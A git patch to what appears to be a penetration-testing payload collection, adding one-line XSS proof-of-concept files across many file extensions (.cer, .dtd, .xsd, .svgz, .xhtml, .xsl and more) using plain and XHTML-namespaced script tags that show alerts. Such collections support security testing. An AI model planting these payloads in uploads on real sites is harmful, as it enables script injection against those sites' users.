From bbc9029dd69ece276074409e766492194b199103 Mon Sep 17 00:00:00 2001
From: Swissky <swisskysec@protonmail.com>
Date: Tue, 26 Mar 2019 21:49:03 +0100
Subject: [PATCH] XSS in several filetype based on @__Mn1__ blogpost

---
 XSS Injection/Files/xml.xsd                  | 1 +
 XSS Injection/Files/xss.cer                  | 1 +
 XSS Injection/Files/xss.dtd                  | 1 +
 XSS Injection/Files/xss.htm                  | 1 +
 XSS Injection/Files/xss.html.demo            | 1 +
 XSS Injection/Files/xss.hxt                  | 1 +
 XSS Injection/Files/xss.mno                  | 1 +
 XSS Injection/Files/xss.rdf                  | 1 +
 XSS Injection/Files/xss.svgz                 | 1 +
 XSS Injection/Files/xss.vml                  | 1 +
 XSS Injection/Files/xss.wsdl                 | 1 +
 XSS Injection/Files/xss.xht                  | 1 +
 XSS Injection/Files/xss.xhtml                | 1 +
 XSS Injection/Files/{XML XSS.xml => xss.xml} | 2 +-
 XSS Injection/Files/xss.xsd                  | 1 +
 XSS Injection/Files/xss.xsf                  | 1 +
 XSS Injection/Files/xss.xsl                  | 1 +
 XSS Injection/Files/xss.xslt                 | 1 +
 18 files changed, 18 insertions(+), 1 deletion(-)
 create mode 100644 XSS Injection/Files/xml.xsd
 create mode 100644 XSS Injection/Files/xss.cer
 create mode 100644 XSS Injection/Files/xss.dtd
 create mode 100644 XSS Injection/Files/xss.htm
 create mode 100644 XSS Injection/Files/xss.html.demo
 create mode 100644 XSS Injection/Files/xss.hxt
 create mode 100644 XSS Injection/Files/xss.mno
 create mode 100644 XSS Injection/Files/xss.rdf
 create mode 100644 XSS Injection/Files/xss.svgz
 create mode 100644 XSS Injection/Files/xss.vml
 create mode 100644 XSS Injection/Files/xss.wsdl
 create mode 100644 XSS Injection/Files/xss.xht
 create mode 100644 XSS Injection/Files/xss.xhtml
 rename XSS Injection/Files/{XML XSS.xml => xss.xml} (84%)
 create mode 100644 XSS Injection/Files/xss.xsd
 create mode 100644 XSS Injection/Files/xss.xsf
 create mode 100644 XSS Injection/Files/xss.xsl
 create mode 100644 XSS Injection/Files/xss.xslt

diff --git a/XSS Injection/Files/xml.xsd b/XSS Injection/Files/xml.xsd
new file mode 100644
index 0000000..2f2094d
--- /dev/null
+++ b/XSS Injection/Files/xml.xsd	
@@ -0,0 +1 @@
+<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>
\ No newline at end of file
diff --git a/XSS Injection/Files/xss.cer b/XSS Injection/Files/xss.cer
new file mode 100644
index 0000000..d58a4dc
--- /dev/null
+++ b/XSS Injection/Files/xss.cer	
@@ -0,0 +1 @@
+<script>alert(1)</script>
\ No newline at end of file
diff --git a/XSS Injection/Files/xss.dtd b/XSS Injection/Files/xss.dtd
new file mode 100644
index 0000000..2f2094d
--- /dev/null
+++ b/XSS Injection/Files/xss.dtd	
@@ -0,0 +1 @@
+<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>
\ No newline at end of file
diff --git a/XSS Injection/Files/xss.htm b/XSS Injection/Files/xss.htm
new file mode 100644
index 0000000..d58a4dc
--- /dev/null
+++ b/XSS Injection/Files/xss.htm	
@@ -0,0 +1 @@
+<script>alert(1)</script>
\ No newline at end of file
diff --git a/XSS Injection/Files/xss.html.demo b/XSS Injection/Files/xss.html.demo
new file mode 100644
index 0000000..2f2094d
--- /dev/null
+++ b/XSS Injection/Files/xss.html.demo	
@@ -0,0 +1 @@
+<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>
\ No newline at end of file
diff --git a/XSS Injection/Files/xss.hxt b/XSS Injection/Files/xss.hxt
new file mode 100644
index 0000000..d58a4dc
--- /dev/null
+++ b/XSS Injection/Files/xss.hxt	
@@ -0,0 +1 @@
+<script>alert(1)</script>
\ No newline at end of file
diff --git a/XSS Injection/Files/xss.mno b/XSS Injection/Files/xss.mno
new file mode 100644
index 0000000..18c2fa9
--- /dev/null
+++ b/XSS Injection/Files/xss.mno	
@@ -0,0 +1 @@
+<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1337)</a:script>
\ No newline at end of file
diff --git a/XSS Injection/Files/xss.rdf b/XSS Injection/Files/xss.rdf
new file mode 100644
index 0000000..2f2094d
--- /dev/null
+++ b/XSS Injection/Files/xss.rdf	
@@ -0,0 +1 @@
+<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>
\ No newline at end of file
diff --git a/XSS Injection/Files/xss.svgz b/XSS Injection/Files/xss.svgz
new file mode 100644
index 0000000..2f2094d
--- /dev/null
+++ b/XSS Injection/Files/xss.svgz	
@@ -0,0 +1 @@
+<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>
\ No newline at end of file
diff --git a/XSS Injection/Files/xss.vml b/XSS Injection/Files/xss.vml
new file mode 100644
index 0000000..2f2094d
--- /dev/null
+++ b/XSS Injection/Files/xss.vml	
@@ -0,0 +1 @@
+<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>
\ No newline at end of file
diff --git a/XSS Injection/Files/xss.wsdl b/XSS Injection/Files/xss.wsdl
new file mode 100644
index 0000000..2f2094d
--- /dev/null
+++ b/XSS Injection/Files/xss.wsdl	
@@ -0,0 +1 @@
+<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>
\ No newline at end of file
diff --git a/XSS Injection/Files/xss.xht b/XSS Injection/Files/xss.xht
new file mode 100644
index 0000000..2f2094d
--- /dev/null
+++ b/XSS Injection/Files/xss.xht	
@@ -0,0 +1 @@
+<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>
\ No newline at end of file
diff --git a/XSS Injection/Files/xss.xhtml b/XSS Injection/Files/xss.xhtml
new file mode 100644
index 0000000..2f2094d
--- /dev/null
+++ b/XSS Injection/Files/xss.xhtml	
@@ -0,0 +1 @@
+<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>
\ No newline at end of file
diff --git a/XSS Injection/Files/XML XSS.xml b/XSS Injection/Files/xss.xml
similarity index 84%
rename from XSS Injection/Files/XML XSS.xml
rename to XSS Injection/Files/xss.xml
index 050b157..b65f614 100644
--- a/XSS Injection/Files/XML XSS.xml	
+++ b/XSS Injection/Files/xss.xml	
@@ -2,7 +2,7 @@
 	<head></head>
 	<body>
 		<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
-
+		<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(2)</a:script>
 		<info>
 		  <name>
 		    <value><![CDATA[<script>confirm(document.domain)</script>]]></value>
diff --git a/XSS Injection/Files/xss.xsd b/XSS Injection/Files/xss.xsd
new file mode 100644
index 0000000..2f2094d
--- /dev/null
+++ b/XSS Injection/Files/xss.xsd	
@@ -0,0 +1 @@
+<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>
\ No newline at end of file
diff --git a/XSS Injection/Files/xss.xsf b/XSS Injection/Files/xss.xsf
new file mode 100644
index 0000000..2f2094d
--- /dev/null
+++ b/XSS Injection/Files/xss.xsf	
@@ -0,0 +1 @@
+<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>
\ No newline at end of file
diff --git a/XSS Injection/Files/xss.xsl b/XSS Injection/Files/xss.xsl
new file mode 100644
index 0000000..2f2094d
--- /dev/null
+++ b/XSS Injection/Files/xss.xsl	
@@ -0,0 +1 @@
+<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>
\ No newline at end of file
diff --git a/XSS Injection/Files/xss.xslt b/XSS Injection/Files/xss.xslt
new file mode 100644
index 0000000..2f2094d
--- /dev/null
+++ b/XSS Injection/Files/xss.xslt	
@@ -0,0 +1 @@
+<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>
\ No newline at end of file